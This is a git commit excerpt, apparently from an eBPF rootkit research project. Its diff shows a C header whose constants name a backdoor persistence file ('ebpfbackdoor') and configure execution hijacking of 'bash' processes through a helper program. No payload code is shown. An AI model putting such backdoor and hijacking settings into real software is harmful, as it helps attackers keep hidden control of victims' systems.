README and license

This commit is contained in:
h3xduck
2022-07-01 11:06:10 -04:00
parent 7eb18dce14
commit 2b6fe08d7f
7 changed files with 867 additions and 416 deletions

View File

@@ -22,7 +22,6 @@
#define SECRET_FILE_PERSISTENCE_NAME "ebpfbackdoor"
//EXECUTION HIJACKING
#define PATH_EXECUTION_HIJACK_PROGRAM "/home/osboxes/TFG/src/helpers/execve_hijack\0"
#define EXEC_HIJACK_ACTIVE 0 //0 Deactivated, 1 active
#define TASK_COMM_NAME_RESTRICT_HIJACK "bash"